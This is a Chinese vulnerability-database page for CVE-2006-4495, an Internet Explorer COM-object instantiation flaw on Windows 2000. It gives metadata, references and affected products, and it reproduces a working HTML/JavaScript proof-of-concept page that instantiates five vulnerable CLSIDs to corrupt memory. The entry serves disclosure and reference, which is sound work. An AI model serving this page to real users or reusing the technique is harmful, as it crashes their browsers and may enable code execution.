Microsoft Internet Explorer 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110870 漏洞类型 边界条件错误
发布时间 2006-08-21 更新时间 2007-06-27
CVE编号 CVE-2006-4495 CNNVD-ID CNNVD-200608-509
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28420
https://www.securityfocus.com/bid/19636
https://cxsecurity.com/issue/WLB-2006090002
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-509
|漏洞详情
MicrosoftInternetExplorer浏览器允许远程攻击者通过对某些Windows2000ActiveXCOM对象,包括:(1)ciodm.dll,(2)myinfo.dll,(3)msdxm.ocx和(4)creator.dll进行实例化操作,从而触发拒绝服务攻击(内存破坏),并可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19636/info

Microsoft Windows 2000 is prone to multiple memory-corruption vulnerabilities that are related to the instantiation of COM objects. These issues may be remotely triggered through Internet Explorer.

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls. This may result in arbitrary code execution, but this has not been confirmed. The affected objects are not likely intended to be instantiated through Internet Explorer.

This BID may be related to the issues discussed in BID 17453 (Microsoft Internet Explorer COM Object Instantiation Code Execution Vulnerability). However, these issues affect a different set of COM objects that were not addressed in previous BIDs.

<!-- // Windows 2000 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000 SP4 CN // http://www.xsec.org // nop (nop#xsec.org) --> <html> <head> <title>COM-tester</title> </head> </body> <script> var i =0; var clsid = new Array( // NO: 1 // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} // Info: Microsoft Index Server Catalog Administration Object // ProgID: Microsoft.ISCatAdm.1 // InprocServer32: C:\WINNT\system32\ciodm.dll "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", // NO: 2 // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", // NO: 3 // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} // Info: RadioServer Class // ProgID: Mmedia.RadioServer.1 // InprocServer32: C:\WINNT\system32\msdxm.ocx "{8E71888A-423F-11D2-876E-00A0C9082467}", // NO: 4 media player? // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} // Info: CdCreator Class// ProgID: Creator.CdCreator.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{606EF130-9852-11D3-97C6-0060084856D4}", // NO: 5 media player? // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} // Info: CdDevice Class// ProgID: Creator.CdDevice.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{F849164D-9863-11D3-97C6-0060084856D4}", // END null ); while(clsid[i]) { var a = document.createElement("object"); window.status = "Testing Object " + clsid[i] + "..."; a.setAttribute("classid", "clsid:" + clsid[i]); i++; } window.status = "failed!"; </script> </body> </html>
|受影响的产品
Microsoft Windows 2000 Server SP4 Microsoft Windows 2000 Server SP3 Microsoft Windows 2000 Server SP2 Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Server
|参考资料

来源:MISC
链接:http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16
来源:BID
名称:19636
链接:http://www.securityfocus.com/bid/19636
来源:BUGTRAQ
名称:20060821[XSec-06-08]:Windows2000MultipleCOMObjectInstantiationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443896/100/100/threaded
来源:XF
名称:ie-win2k-com-dos(28512)
链接:http://xforce.iss.net/xforce/xfdb/28512
来源:SREASON
名称:1474
链接:http://securityreason.com/securityalert/1474